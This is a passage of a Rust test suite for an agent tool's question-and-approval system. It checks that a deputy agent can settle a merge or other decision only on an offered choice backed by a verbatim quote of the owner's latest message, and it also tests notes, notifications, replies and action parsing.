2874 "run".into(),
2875 crate::land::APPROVAL_NODE.into(),
2876 "land".into(),
2877 "Merge?".into(),
2878 String::new(),
2879 vec!["merge".into(), "hold".into()],
2880 );
2881 let mut dep = Deputy::new("brief".into());
2882 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2883 q.deputy = Some(dep);
2884 q
2885 }
2886
2887 #[test]
2888 fn a_merge_approval_settles_on_a_verbatim_quote_of_the_latest_message() {
2889 let mut q = approval_question();
2890 q.say("merge").unwrap();
2891 q.reply("sure?", vec!["merge".into(), "hold".into()])
2892 .unwrap();
2893 q.say(" Merge it please ").unwrap();
2894 assert!(
2895 q.settle_by_deputy("deputy-x", "merge", " ", None)
2896 .is_err(),
2897 "an empty quote is refused"
2898 );
2899 assert!(
2900 q.settle_by_deputy("deputy-x", "merge", "ship it", None)
2901 .is_err(),
2902 "a quote the owner never said is refused"
2903 );
2904 assert_eq!(q.status, QuestionStatus::Open);
2905 q.settle_by_deputy("deputy-x", "merge", "Merge it please", None)
2906 .unwrap();
2907 assert_eq!(q.resolution().as_deref(), Some("merge"));
2908 }
2909
2910 #[test]
2911 fn a_local_release_approval_is_held_to_the_merge_rules_but_an_escalation_is_not() {
2912 let mk = |choices: Vec<String>| {
2913 let mut q = Question::new(
2914 String::new(),
2915 crate::bump::NOTICE_NODE.into(),
2916 "release-watch".into(),
2917 "Release?".into(),
2918 String::new(),
2919 choices,
2920 );
2921 let mut dep = Deputy::new("brief".into());
2922 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2923 q.deputy = Some(dep);
2924 q
2925 };
2926 let mut approval = mk(vec!["merge".into(), "hold".into()]);
2927 assert!(crate::deputy::merge_gated(&approval));
2928 approval.say("マージしていいよ").unwrap();
2929 assert!(
2930 approval
2931 .settle_by_deputy("deputy-x", "merge", "ぜひマージして", None)
2932 .is_err(),
2933 "a quote the owner never said is refused"
2934 );
2935 approval
2936 .settle_by_deputy("deputy-x", "merge", "マージしていいよ", None)
2937 .unwrap();
2938
2939 let mut esc = mk(vec!["rerun again".into(), "hold".into(), "leave it".into()]);
2940 assert!(!crate::deputy::merge_gated(&esc));
2941 esc.say("もう監視はいらない").unwrap();
2942 esc.settle_by_deputy("deputy-x", "leave it", "監視はいらない", None)
2943 .unwrap();
2944 assert_eq!(esc.resolution().as_deref(), Some("leave it"));
2945 }
2946
2947 #[test]
2948 fn a_merge_among_other_requests_settles_but_hold_needs_the_whole_message() {
2949 let mut q = approval_question();
2950 q.say("マージしていいよ。残りのレビュー指摘はフォローアップタスクとして積んで")
2951 .unwrap();
2952 assert!(
2953 q.settle_by_deputy("deputy-x", "merge", "どこかの言葉", None)
2954 .is_err(),
2955 "the quote must be the owner's"
2956 );
2957 assert!(
2958 q.settle_by_deputy("deputy-x", "hold", "マージしていいよ", None)
2959 .is_err(),
2960 "`hold` still needs the whole message"
2961 );
2962 q.settle_by_deputy("deputy-x", "merge", "マージしていいよ", None)
2963 .unwrap();
2964 assert_eq!(q.resolution().as_deref(), Some("merge"));
2965 }
2966
2967 fn settle_ready() -> Question {
2968 let mut q = Question::new(
2969 "task".to_owned(),
2970 "conduct".to_owned(),
2971 "conduct".to_owned(),
2972 "Done?".to_owned(),
2973 String::new(),
2974 vec!["yes".to_owned(), "no".to_owned()],
2975 );
2976 let mut seat = crate::agent::SeatState::new("deputy-x", "alpha", 1);
2977 seat.turns = 1;
2978 let mut dep = Deputy::new("brief".to_owned());
2979 dep.seat = Some(seat);
2980 q.deputy = Some(dep);
2981 q.say("setup done, and file a follow-up").unwrap();
2982 q
2983 }
2984
2985 #[test]
2986 fn a_settle_note_is_stored_on_the_turn_through_update_and_reads_back() {
2987 let dir = tempfile::TempDir::new().unwrap();
2988 let store = Questions::at(dir.path().join("questions"));
2989 let mut q = settle_ready();
2990 let id = q.id.clone();
2991 store.put(&mut q).unwrap();
2992 store
2993 .update(&id, |q| {
2994 q.settle_by_deputy(
2995 "deputy-x",
2996 "yes",
2997 "setup done",
2998 Some(" no follow-up was queued "),
2999 )
3000 })
3001 .unwrap();
3002 let back = store.get(&id).unwrap();
3003 let turn = back.thread.last().unwrap();
3004 assert_eq!(turn.who, Who::Agent);
3005 assert!(turn.body.starts_with("Settled as `yes`"));
3006 assert_eq!(turn.note.as_deref(), Some("no follow-up was queued"));
3007 assert_eq!(back.thread[0].note, None);
3008 }
3009
3010 #[test]
3011 fn an_empty_or_blank_settle_note_is_no_note() {
3012 for note in [None, Some(""), Some(" \n ")] {
3013 let mut q = settle_ready();
3014 q.settle_by_deputy("deputy-x", "yes", "setup done", note)
3015 .unwrap();
3016 assert_eq!(q.thread.last().unwrap().note, None, "{note:?}");
3017 let json = serde_json::to_string(&q).unwrap();
3018 assert!(!json.contains("\"note\""), "no key when there is none");
3019 }
3020 }
3021
3022 #[test]
3023 fn a_refused_settle_leaves_no_note_behind() {
3024 let mut q = settle_ready();
3025 let before = q.thread.clone();
3026 assert!(
3027 q.settle_by_deputy("deputy-x", "yes", "never said this", Some("n"))
3028 .is_err()
3029 );
3030 assert!(
3031 q.settle_by_deputy("someone-else", "yes", "setup done", Some("n"))
3032 .is_err()
3033 );
3034 assert_eq!(q.thread, before);
3035 assert_eq!(q.status, QuestionStatus::Open);
3036 }
3037
3038 #[test]
3039 fn a_turn_written_before_notes_existed_still_reads() {
3040 let t: Turn =
3041 serde_json::from_str(r#"{"who":"agent","body":"old","at":"2026-01-01T00:00:00Z"}"#)
3042 .unwrap();
3043 assert_eq!(t.note, None);
3044 }
3045
3046 #[test]
3047 fn a_quote_from_an_earlier_owner_message_does_not_settle_a_merge() {
3048 let mut q = approval_question();
3049 q.say("merge").unwrap();
3050 q.reply("sure?", vec!["merge".into(), "hold".into()])
3051 .unwrap();
3052 q.say("wait, hold off").unwrap();
3053 assert!(
3054 q.settle_by_deputy("deputy-x", "merge", "merge", None)
3055 .is_err()
3056 );
3057 assert_eq!(q.status, QuestionStatus::Open);
3058 }
3059
3060 #[test]
3061 fn a_deputy_settles_only_on_an_offered_choice_and_the_owners_own_words() {
3062 let mut q = Question::new(
3063 "task".to_owned(),
3064 "conduct".to_owned(),
3065 "conduct".to_owned(),
3066 "Done?".to_owned(),
3067 String::new(),
3068 vec!["yes".to_owned(), "no".to_owned()],
3069 );
3070 let mut seat = crate::agent::SeatState::new("deputy-x", "alpha", 1);
3071 seat.turns = 1;
3072 let mut dep = Deputy::new("brief".to_owned());
3073 dep.seat = Some(seat);
3074 q.deputy = Some(dep);
3075 q.say("setup done, go ahead").unwrap();
3076
3077 assert!(
3078 q.settle_by_deputy("someone-else", "yes", "setup done", None)
3079 .is_err()
3080 );
3081 assert!(
3082 q.settle_by_deputy("deputy-x", "maybe", "setup done", None)
3083 .is_err()
3084 );
3085 assert!(
3086 q.settle_by_deputy("deputy-x", "yes", "never said this", None)
3087 .is_err()
3088 );
3089 assert!(q.settle_by_deputy("deputy-x", "yes", " ", None).is_err());
3090 assert_eq!(q.status, QuestionStatus::Open);
3091
3092 q.settle_by_deputy("deputy-x", "yes", "setup done", None)
3093 .unwrap();
3094 assert_eq!(q.status, QuestionStatus::Answered);
3095 assert_eq!(q.resolution().as_deref(), Some("yes"));
3096 let last = q.thread.last().unwrap();
3097 assert_eq!(last.who, Who::Agent);
3098 assert!(
3099 last.body.contains("setup done"),
3100 "the quote stays on the record"
3101 );
3102 }
3103
3104 #[test]
3105 fn a_question_written_before_deputies_still_reads() {
3106 let mut q = Question::new(
3107 "task".to_owned(),
3108 "conduct".to_owned(),
3109 "conduct".to_owned(),
3110 "Done?".to_owned(),
3111 String::new(),
3112 Vec::new(),
3113 );
3114 q.schema = 4;
3115 let mut v = serde_json::to_value(&q).unwrap();
3116 v.as_object_mut().unwrap().remove("deputy");
3117 let back: Question = serde_json::from_value(v).unwrap();
3118 assert!(back.deputy.is_none());
3119 }
3120
3121 #[test]
3122 fn saying_something_appends_an_operator_turn_without_deciding_anything() {
3123 let mut q = choice_question();
3124 q.say("does the cache need eviction?").unwrap();
3125 assert_eq!(q.thread.len(), 1);
3126 assert_eq!(q.thread[0].who, Who::Operator);
3127 assert_eq!(q.thread[0].body, "does the cache need eviction?");
3128 assert_eq!(q.status, QuestionStatus::Open);
3131 assert!(q.answer.is_none());
3132 assert!(q.waiting_on_agent(), "the ball is now in the agent's court");
3133 }
3134
3135 #[test]
3136 fn saying_and_replying_are_refused_on_a_settled_question_and_on_empty_text() {
3137 let mut answered = choice_question();
3138 answered
3139 .answer(Answer::Choice("SQLite".to_owned()))
3140 .unwrap();
3141 let a = answered.say("still there?").unwrap_err().to_string();
3142 assert!(a.contains("already answered"), "{a}");
3143 let b = answered
3144 .reply("still there?", vec![])
3145 .unwrap_err()
3146 .to_string();
3147 assert!(b.contains("already answered"), "{b}");
3148
3149 let mut abandoned = choice_question();
3150 abandoned.abandon("timed out");
3151 let c = abandoned.say("hello?").unwrap_err().to_string();
3152 assert!(c.contains("abandoned"), "{c}");
3153
3154 let mut open = choice_question();
3155 let d = open.say(" ").unwrap_err().to_string();
3156 assert!(d.contains("empty"), "{d}");
3157 let e = open.reply(" \n", vec![]).unwrap_err().to_string();
3158 assert!(e.contains("empty"), "{e}");
3159 assert!(open.thread.is_empty(), "a refused turn leaves no trace");
3160 }
3161
3162 #[test]
3163 fn a_reply_replaces_the_choices_and_moves_the_ball_back_to_the_owner() {
3164 let mut q = choice_question();
3165 q.say("SQLite or Redis, but what about disk space?")
3166 .unwrap();
3167 assert!(q.waiting_on_agent());
3168
3169 q.reply(
3170 "SQLite: it is one file, no server to run.",
3171 vec!["SQLite".to_owned()],
3172 )
3173 .unwrap();
3174
3175 assert_eq!(q.choices, ["SQLite"]);
3176 assert!(
3177 !q.waiting_on_agent(),
3178 "the agent spoke, so the owner is the one being waited on now"
3179 );
3180 assert_eq!(q.thread.len(), 2);
3181 assert_eq!(q.thread[1].who, Who::Agent);
3182
3183 assert!(q.answer(Answer::Choice("Redis".to_owned())).is_err());
3185 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3186 assert_eq!(q.resolution().as_deref(), Some("SQLite"));
3187 }
3188
3189 #[test]
3190 fn notification_fires_for_the_first_ask_and_only_after_the_quiet_window_on_a_reply() {
3191 let mut fresh = choice_question();
3192 assert!(
3193 fresh.should_notify(Timestamp::now()),
3194 "nobody has been notified yet, so the first ask always pages"
3195 );
3196
3197 fresh.say("why not Postgres?").unwrap();
3198 let just_said = fresh.thread[0].at;
3199 assert!(
3200 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(60)),
3201 "still on the screen a minute later; no need to page again"
3202 );
3203 assert!(
3204 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(300)),
3205 "exactly the window: `>` means this side stays quiet"
3206 );
3207 assert!(
3208 fresh.should_notify(just_said + jiff::SignedDuration::from_secs(301)),
3209 "past the window: they may have walked away"
3210 );
3211 }
3212
3213 #[test]
3214 fn a_round_trip_of_turns_still_counts_as_one_open_question() {
3215 let (_dir, s) = store();
3216 let mut q = choice_question();
3217 s.put(&mut q).unwrap();
3218 q.say("why not Postgres?").unwrap();
3219 s.put(&mut q).unwrap();
3220 q.reply("no server to run", vec!["SQLite".to_owned()])
3221 .unwrap();
3222 s.put(&mut q).unwrap();
3223
3224 assert_eq!(
3225 s.count_open(),
3226 1,
3227 "one question that talked twice is still one open question"
3228 );
3229 assert_eq!(s.open_for(&q.run).len(), 1);
3230 }
3231
3232 #[tokio::test]
3233 async fn the_wait_returns_to_the_caller_when_the_owner_talks_back_without_deciding() {
3234 let (dir, s) = store();
3235 let mut q = choice_question();
3236 let id = q.id.clone();
3237 let writer = Questions::at(dir.path().join("questions"));
3238 let handle = tokio::spawn(async move {
3239 tokio::time::sleep(Duration::from_millis(30)).await;
3240 let mut fresh = writer.get(&id).expect("the question was filed first");
3241 fresh.say("why not Postgres?").unwrap();
3242 writer.put(&mut fresh).unwrap();
3243 });
3244
3245 let got = wait_for_owner(
3246 &mut q,
3247 &s,
3248 &quiet(),
3249 Duration::from_secs(5),
3250 Duration::from_millis(10),
3251 )
3252 .await
3253 .unwrap();
3254
3255 handle.await.unwrap();
3256 assert_eq!(got, Wait::Replied("why not Postgres?".to_owned()));
3257 assert_eq!(
3258 q.status,
3259 QuestionStatus::Open,
3260 "talking back is not a decision; the question stays open"
3261 );
3262 assert!(q.answer.is_none());
3263 }
3264
3265 #[test]
3266 fn a_say_that_lands_before_the_agents_reply_stays_unread() {
3267 let mut q = choice_question();
3268 q.say("A").unwrap();
3269 q.delivered_turns = q.thread.len();
3270 q.say("B").unwrap();
3271 q.reply("about A", vec![]).unwrap();
3272 assert_eq!(q.unread_from_owner().as_deref(), Some("B"));
3273 q.delivered_turns = q.thread.len();
3274 assert_eq!(q.unread_from_owner(), None);
3275 }
3276
3277 #[test]
3278 fn a_say_before_the_answer_is_handed_over_ahead_of_it() {
3279 let (_d, s) = store();
3280 let mut q = choice_question();
3281 s.put(&mut q).unwrap();
3282 q.say("first").unwrap();
3283 q.say("second").unwrap();
3284 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3285 s.put(&mut q).unwrap();
3286 assert_eq!(q.unread_from_owner(), None, "closed: the guard stays");
3287 let mut out = Vec::new();
3288 deliver_answer(&s, &mut q, "SQLite", &mut out).unwrap();
3289 let shown = String::from_utf8(out).unwrap();
3290 let (a, b, c) = (
3291 shown.find("first").unwrap(),
3292 shown.find("second").unwrap(),
3293 shown.find("SQLite").unwrap(),
3294 );
3295 assert!(a < b && b < c, "{shown}");
3296 assert_eq!(q.delivered_turns, q.thread.len());
3297 assert!(q.answer_delivered);
3298 }
3299
3300 #[test]
3301 fn an_answer_alone_is_unchanged_and_delivered_says_are_not_repeated() {
3302 let mut q = choice_question();
3303 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3304 assert_eq!(answer_for_agent(&q, "SQLite"), "SQLite");
3305 let mut q = choice_question();
3306 q.say("old").unwrap();
3307 q.delivered_turns = q.thread.len();
3308 q.say("new").unwrap();
3309 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3310 let shown = answer_for_agent(&q, "SQLite");
3311 assert!(shown.contains("new") && !shown.contains("old"), "{shown}");
3312 }
3313
3314 #[test]
3315 fn action_specs_parse_strictly_and_must_name_an_offered_choice() {
3316 let choices = vec!["resume で続行する".to_owned(), "wait".to_owned()];
3317 let ok = parse_actions(
3318 &[
3319 "resume で続行する=resume".to_owned(),
3320 "wait=done".to_owned(),
3321 ],
3322 &choices,
3323 "run-1",
3324 )
3325 .unwrap();
3326 assert_eq!(
3327 ok["resume で続行する"],
3328 ChoiceAction::Resume {
3329 run: "run-1".into()
3330 }
3331 );
3332 assert_eq!(ok["wait"], ChoiceAction::Done);
3333
3334 let named = ChoiceAction::parse("x=resume:abcd", "").unwrap();
3335 assert_eq!(named.1, ChoiceAction::Resume { run: "abcd".into() });
3336 assert_eq!(
3337 ChoiceAction::parse("x=requeue", "").unwrap().1,
3338 ChoiceAction::Requeue
3339 );
3340
3341 for bad in [
3342 "no-equals",
3343 "=done",
3344 "x=resume",
3345 "x=resume:",
3346 "x=explode",
3347 "x=done:1",
3348 ] {
3349 assert!(ChoiceAction::parse(bad, "").is_err(), "{bad}");
3350 }
3351 assert!(parse_actions(&["ghost=done".to_owned()], &choices, "").is_err());
3352 assert!(
3353 parse_actions(
3354 &["wait=done".to_owned(), "wait=requeue".to_owned()],
3355 &choices,
3356 ""
3357 )
3358 .is_err()
3359 );
3360 }
3361
3362 #[test]
3363 fn only_a_chosen_label_with_an_action_is_actionable() {
3364 let mut q = choice_question();
3365 q.choices = vec!["resume".to_owned(), "SQLite".to_owned()];
3366 q.actions.insert("SQLite".to_owned(), ChoiceAction::Requeue);
3367 assert!(q.chosen_action().is_none(), "unanswered");
3368 q.answer(Answer::Choice("resume".to_owned())).unwrap();
3369 assert!(
3370 q.chosen_action().is_none(),
3371 "a label that merely reads like an action does nothing"
3372 );
3373
3374 let mut q2 = choice_question();
3375 q2.choices = vec!["SQLite".to_owned()];
3376 q2.actions
3377 .insert("SQLite".to_owned(), ChoiceAction::Requeue);
3378 q2.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3379 assert_eq!(q2.chosen_action(), Some(&ChoiceAction::Requeue));
3380 }
3381
3382 #[test]
3383 fn a_reply_drops_actions_whose_choice_is_gone_and_old_files_read_without_actions() {
3384 let mut q = choice_question();
3385 q.choices = vec!["A".to_owned(), "B".to_owned()];
3386 q.actions.insert("A".to_owned(), ChoiceAction::Done);
3387 q.actions.insert("B".to_owned(), ChoiceAction::Requeue);
3388 q.reply("narrowing", vec!["B".to_owned()]).unwrap();
3389 assert_eq!(q.actions.len(), 1);
3390 assert!(q.actions.contains_key("B"));
3391
3392 let mut v = serde_json::to_value(&q).unwrap();
3393 v.as_object_mut().unwrap().remove("actions");
3394 let old: Question = serde_json::from_value(v).unwrap();
3395 assert!(old.actions.is_empty());
3396 }
3397}